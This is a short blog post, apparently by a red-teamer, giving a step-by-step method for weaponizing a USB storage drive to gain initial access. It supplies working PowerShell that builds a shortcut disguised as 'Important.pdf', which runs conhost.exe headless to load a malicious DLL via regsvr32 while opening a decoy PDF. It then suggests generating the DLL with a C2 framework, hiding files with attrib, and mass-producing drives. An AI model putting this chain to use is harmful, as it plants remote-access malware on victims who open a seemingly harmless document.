#
How to weaponize USB key like a real script kiddy for fun & profit
#
Introduction
During a red team engagement, it can be interesting to learn how to weaponize a USB key (all in full storage) to gain initial access. Compared to the limitations one might face with the famous "HID" USB keys, which are limited by the victim's layout as well as the security measures they may have in place (for example, authorized HID protections or others). Certainly, limitations can arise in the case of an full-storage USB key (such as the blocking of USB storage devices by GPOs), however, I have not encountered any so far.
Here, in this blog post, we will be inspired by phishing techniques via ISO (initially allowing us to bypass detections by Mark-Of-The-Web).
The goal of this technique is to ultimately create a pseudo-perfect complex infection chain shown below, as seen in most techniques used for initial access
DELIVERY(CONTAINER(TRIGGER + PAYLOAD + DECOY)) There is gonna be : USB_DROP(USB(LNK+DLL+PDF))
#
Weaponization time
To set up our attack, we will use Windows shortcut files. The advantage of this is that on Windows, an LNK file does not have a visible extension. So, for example, if we name our file Important.pdf.lnk, the user sees the file as Important.pdf. Additionally, with LNK files, we can use CMD to open a PDF file directly without specifying a third-party program, like this:
C:\Users\Noodle> Important.pdfWe also use the lolbas conhost.exe, which acts as a "proxy" binary to execute our malware in a legitimate way because conhost.exe is a legitimate binary in Windows. Furthermore, by passing an argument to Conhost, it is possible to hide the rest of the child processes made by conhost.
Here is the execution graph:
graph TD;
R["Usb contains .LNK application"];
R -->|Launch| B["Beautiful PDF"];
R -->|Execute| C["Conhost.exe (or other lolbas)"];
C -->|Execute proxy binary| D["A malicious DLL"]
#
Create malicious .LNK
We gonna use this powershell code to generate a LNK executing LOLBAS conhost.exe
$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("Important.pdf.lnk")
$link.windowstyle = "7"
$link.targetpath = "c:\windows\system32\conhost.exe"
$link.iconlocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13"
$link.arguments = "--headless cmd /c regsvr32.exe ./msedge.dll | Important.pdf" #Thanks 4 lolbas
$link.save()
#
Create malicious DLL and hide your shit
Now that we have our LNK which will load the malicious DLL (or any other file, feel free to check out mgeeky's training for that), we just need to create it. For this, we can generate a DLL with our favorite C2 (here it'll be Sliver) or create one from scratch.
After that, we hide the files that don't need to be seen by the user (the legitimate PDF file and the malicious DLL) with the command "attrib".
attrib +h Important.pdf
#
Execution
Now that everything is ready, we have an weaponized USB drive. Given the simplicity of this technique, it is possible to script everything to generate multiple drives at once (additionally, considering the hardware, this doesn't require significant financial resources to have dozens or hundreds).
#
Inspiration
To be able to create this article and learn about the technique, I had to read several technical references listed below:
- File smuggling
- Advanced USB key phishing
- Modifying .lnk Shortcuts
- Red-Teaming Tool Being Abused by Malicious Actors
- Lolbas
- WarCon22 - Modern Initial Access and Evasion Tactics
- Recreating an ISO Payload for fun and no profit
- Deriving intelligence from LNK files
#
Special thanks
- Euz for proofreading
#
The end
Here is my first article. Admittedly, it discusses a fairly simple topic and doesn't cover anything new, but I found it interesting to share this technique. Feel free to give me feedback .